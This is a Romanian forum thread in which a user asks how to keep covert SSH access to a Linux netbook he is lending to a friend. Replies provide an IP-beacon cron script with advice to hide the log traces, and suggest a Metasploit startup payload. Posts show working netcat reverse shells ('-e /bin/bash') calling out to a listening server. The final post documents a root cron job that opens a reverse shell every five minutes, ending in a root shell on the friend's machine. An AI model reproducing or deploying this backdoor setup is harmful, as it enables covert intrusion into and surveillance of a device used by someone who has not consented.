Jump to content
shaggi

Remote administration tool for linux

Recommended Posts

Posted

Deci, am un netbook cu linux. Il voi imprumuta unui prieten pe o anumita perioada, vreau ca atat timp cat el e conectat la wi-fi sau la orice altceva si are o conexiune la internet eu sa am acces ssh.

Idei?

am si un vps care poate fi folosit daca e nevoie de ceva cu ip static ....

Posted

Lasi elinks sau lynx instalat, creezi un crontab (scoti logurile deoarece s-ar putea sa-i spuna cand intra in consola faza cu New mail) si rulezi un cronjob la fiecare whatever minutes care iti acceseaza un link al tau cu ip=ul lui. Va fi ceva de genul:

a.sh

#!/bin/bash
for i in `ifconfig -a |grep inet |awk -F ':' '{print $2}' |awk '{print $1}'`
do
if [ $i != '' ]
then
elinks http://yourhost/$i > /dev/null
fi
done

Ulterior poti verifica in access_log cine ce a accesat si vei avea ip-urile disponibile.

De retinut urmatoarele chestii:

1. Trebuie sa ai sshd-ul configurat in prealabil sa ruleze pe toate runlevelele

2. Sa nu ai iptables sau orice alt serviciu care ti-ar putea bloca sshdu

3. Sa permita routerul de unde se conecteaza el conexiun incoming pe portul 22 sau pe portul care il setezi tu ca default pentru sshd.

Cam atat, mai mutle idei nu-mi vin pe moment. BBL ma uit la film. Bafta

Posted

tocmai aia e faza, degeaba face listening, ca routerele au NAT, nu aloca ip public & unic pe fiecare pc conectat

acum lucram la ceva gen " nc localhost 13370 <file|bash>file "

Posted (edited)
tocmai aia e faza, degeaba face listening, ca routerele au NAT, nu aloca ip public & unic pe fiecare pc conectat

acum lucram la ceva gen " nc localhost 13370 <file|bash>file "

Daca foloseste router, intradevar ip-ul va fi privat dar retine ca atunci cand faci request-ul prin elinks se salveaza ip-ul public (cel care are iesire la internet)

69.69.69.69 - - [11/Aug/2013:21:23:24 +0300] "GET /test HTTP/1.1" 301 332 "-" "ELinks/0.11.1 (textmode; Linux; -)"

Got it?

Poti incerca si cu NC dar nu recomand :)

Edited by Zatarra
Posted

configurezi sshd, il pornesti, il bagi la startup. faci cont pe no-ip.com si creezi un dns, il setezi pe pc-ul respectiv si bagi la startup.

problema unde ajunge notebook-ul, ca routeru tipului s-ar putea sa nu fie configurat si sa blocheze portul ssh

Posted

Sau mai simplu:) daca ai un server, sau un pc pe care ai linux iti faci un dns la no-ip(in cazul in care ai ip dinamic) si faci un connectback de pe laptop catre pc-ul/serverul tau. Il pui sa ruleze la startup in loop, adica daca nu se poate conecta, reincearca dupa un minut, daca s-a putut conecta nu mai incearca pana cand pica conexiunea. Cand deschizi pc-u tau faci un listener si asta e, scapi si de problema router-ului.

Posted
Sau mai simplu:) daca ai un server, sau un pc pe care ai linux iti faci un dns la no-ip(in cazul in care ai ip dinamic) si faci un connectback de pe laptop catre pc-ul/serverul tau. Il pui sa ruleze la startup in loop, adica daca nu se poate conecta, reincearca dupa un minut, daca s-a putut conecta nu mai incearca pana cand pica conexiunea. Cand deschizi pc-u tau faci un listener si asta e, scapi si de problema router-ului.

Nu am inteles nimic :)) de router nu ai cum sa scapi. Daca e blocat inbound in router e ceau :)

Posted (edited)
Sau mai simplu:) daca ai un server, sau un pc pe care ai linux iti faci un dns la no-ip(in cazul in care ai ip dinamic) si faci un connectback de pe laptop catre pc-ul/serverul tau. Il pui sa ruleze la startup in loop, adica daca nu se poate conecta, reincearca dupa un minut, daca s-a putut conecta nu mai incearca pana cand pica conexiunea. Cand deschizi pc-u tau faci un listener si asta e, scapi si de problema router-ului.

genial !

@zatarra tipul are dreptate, pc`ul se va conecta pe serverul setat, nu invers. exact cum faci cu un rat pe windows, botii nu au nevoie sa deschida portul pentru ca se conecteaza la server.

daca vrea sa faca ssh e problema cu router ca ii blocheaza inbound.

chestia cu connectback sau reversec-onnection e singura metoda. ar putea sa genereze si un payload cu metasploit, il baga in startup care il va lasa in pc`ul care il imprumuta, si va fi listener celalalt pc care va fi si "centru de control", parerea mea

Edited by BkDService
Posted
genial !

@zatarra tipul are dreptate, pc`ul se va conecta pe serverul setat, nu invers. exact cum faci cu un rat pe windows, botii nu au nevoie sa deschida portul pentru ca se conecteaza la server.

daca vrea sa faca ssh e problema cu router ca ii blocheaza inbound.

chestia cu connectback sau reversec-onnection e singura metoda. ar putea sa genereze si un payload cu metasploit, il baga in startup care il va lasa in pc`ul care il imprumuta, si va fi listener celalalt pc care va fi si "centru de control", parerea mea

Mai invatati networking :)

Posted
am practicat cat de cat, nu e nevoie. oi fi tu destept dar nu ma bagi in ceata. cel mai bine asteptam sa dea shaggy dreptate :)

Server:

[root@rstforums test]# ./netcat -v -l -p 6969

Connection from 79.118.55.114:42649

netstat -tulpan |grep 42649

tcp 0 0 192.168.1.100:42649 89.45.193.183:6969 ESTABLISHED 6753/bash

Client:

[root@OptimusPrime html]# netcat rstforums.com 6969 -e /bin/bash

Ma bucur ca nu te-am bagat in ceata si ai inteles ca e conexiune TCP care e bidirectionala si ca foloseste port-ul 42649 (este ales random si care poate fi blocat de router default) pe client (laptopul care vrea Shaggi sa-l dea) pentru a se conecta la serverul care asculta.

Doar ca sa nu te bag mai rau in ceata mie imi functioneaza deoarece am DMZ pe ip-ul respectiv.

Posted (edited)

pe client:


shaggi@tractor:~$ cat /opt/asd.sh
#!/bin/bash
nc *.*.*.* 31337 -e /bin/bash &

shaggi@tractor:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * root /opt/asd.sh
#
shaggi@tractor:~$

pe server:


shaggi@gmail:~$ cat `which listen`
#!/bin/bash
while(true) do nc -v -k -l -p 31337 -vv; done;
shaggi@gmail:~$ listen
listening on [any] 31337 ...

Multumesc tuturor celor ce m-ati ajutat:)

and after a while:


shaggi@gmail:~$ listen
listening on [any] 31337 ...
Warning: forward host lookup failed for cacat.rdsnet.ro: Unknown host
connect to [ip.server] from cacat.rdsnet.ro [ip.client] 51972
id
uid=0(root) gid=0(root) groups=0(root)

Edited by shaggi
Posted
Ma bucur ca nu te-am bagat in ceata si ai inteles ca e conexiune TCP care e bidirectionala si ca foloseste port-ul 42649 (este ales random si care poate fi blocat de router default) pe client (laptopul care vrea Shaggi sa-l dea) pentru a se conecta la serverul care asculta.

Doar ca sa nu te bag mai rau in ceata mie imi functioneaza deoarece am DMZ pe ip-ul respectiv.

Dar daca tot faci connect pe serverul tau, de ce nu faci pe 80(ales la nimereala intre 80 si 443 :P )? Port care dupa parerea mea e deschis pe majoritatea router-elor, cam asa te conectezi pe http :)

Posted
Dar daca tot faci connect pe serverul tau, de ce nu faci pe 80(ales la nimereala intre 80 si 443 :P )? Port care dupa parerea mea e deschis pe majoritatea router-elor, cam asa te conectezi pe http :)

Pe 80 am http si pe 443 am VPN :) That's why

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...